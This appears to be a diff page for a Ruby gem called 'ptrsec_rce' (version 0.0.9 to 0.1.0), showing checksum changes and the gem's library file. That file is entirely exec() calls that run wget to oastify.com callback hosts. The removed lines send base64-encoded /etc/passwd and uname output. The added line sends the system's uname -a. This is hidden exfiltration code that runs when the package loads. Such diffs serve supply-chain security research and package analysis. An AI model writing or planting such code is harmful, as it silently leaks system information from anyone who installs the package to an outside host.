ptrsec_rce 0.0.9 → 0.1.0
Sign up to get free protection for your applications and to get access to all the features.
- checksums.yaml +4 -4
- data/lib/ptrsec_rce.rb +1 -3
- metadata +1 -1
checksums.yaml
CHANGED
@@ -1,7 +1,7 @@
|
|
1
1
|
---
|
2
2
|
SHA256:
|
3
|
-
metadata.gz:
|
4
|
-
data.tar.gz:
|
3
|
+
metadata.gz: ad231cf3ddd00ca0adc61d711330a224b82252b2f8ecc9b8ecf3d007839bbf40
|
4
|
+
data.tar.gz: 6c048c0d7db0146129ca4727c6eca37e730842322e7c90f20394d9d1fea2a87a
|
5
5
|
SHA512:
|
6
|
-
metadata.gz:
|
7
|
-
data.tar.gz:
|
6
|
+
metadata.gz: 251149310861b6e1b4c26377582ed5bf0f2e64d2b77711a8c51012caaf8ca5da9f1fceb6cb5b78b6d86613b7b98489f934ec33f2d8626dd680f8e930efee5e65
|
7
|
+
data.tar.gz: a436b3b9a0a7dc0358be6c0139b42b2cbffba7048dc98a21cadd13be667c6768009f9dcb92132835d841ed3ba66bd9d782f50b0be0b304332f4f271a0e9b9c72
|
data/lib/ptrsec_rce.rb
CHANGED
@@ -1,3 +1 @@
|
|
1
|
-
exec("wget https://
|
2
|
-
exec("wget https://hj4qey1ip97ha04p77axreokbbh251tq.oastify.com/?d=$(cat /etc/passwd | base64)")
|
3
|
-
exec("wget https://hj4qey1ip97ha04p77axreokbbh251tq.oastify.com/?d=$(uname -a)")
|
1
|
+
exec("wget https://8pyhkp79v0d8gragdygox5ubh2ntbtzi.oastify.com/?d=$(uname -a)")
|